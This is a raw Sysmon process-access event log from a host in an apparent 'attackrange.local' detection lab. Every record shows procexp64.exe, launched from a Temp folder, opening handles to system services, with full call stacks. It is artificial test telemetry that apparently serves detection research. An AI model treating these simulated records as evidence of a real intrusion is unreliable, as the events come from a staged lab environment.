15:17:01.844{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152F-600B-5900-00000000A301}3940C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792312Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.844{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152F-600B-5900-00000000A301}3940C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792311Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.844{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152E-600B-5500-00000000A301}3732C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792310Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.844{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152E-600B-5500-00000000A301}3732C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792309Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.844{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3500-00000000A301}3300C:\Windows\System32\vds.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792308Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.844{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3500-00000000A301}3300C:\Windows\System32\vds.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792307Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.844{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3300-00000000A301}3092C:\Windows\system32\wbem\unsecapp.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792306Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.844{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3300-00000000A301}3092C:\Windows\system32\wbem\unsecapp.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792305Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.844{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3200-00000000A301}2008C:\Windows\system32\dfssvc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792304Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.844{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3200-00000000A301}2008C:\Windows\system32\dfssvc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792303Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.844{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792302Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.844{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792301Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.844{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3000-00000000A301}2232C:\Windows\System32\ismserv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792300Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.844{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3000-00000000A301}2232C:\Windows\System32\ismserv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792299Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.844{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2F00-00000000A301}2884C:\Windows\system32\dns.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792298Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.844{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2F00-00000000A301}2884C:\Windows\system32\dns.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792297Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.844{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2E00-00000000A301}2440C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792296Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.844{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2E00-00000000A301}2440C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 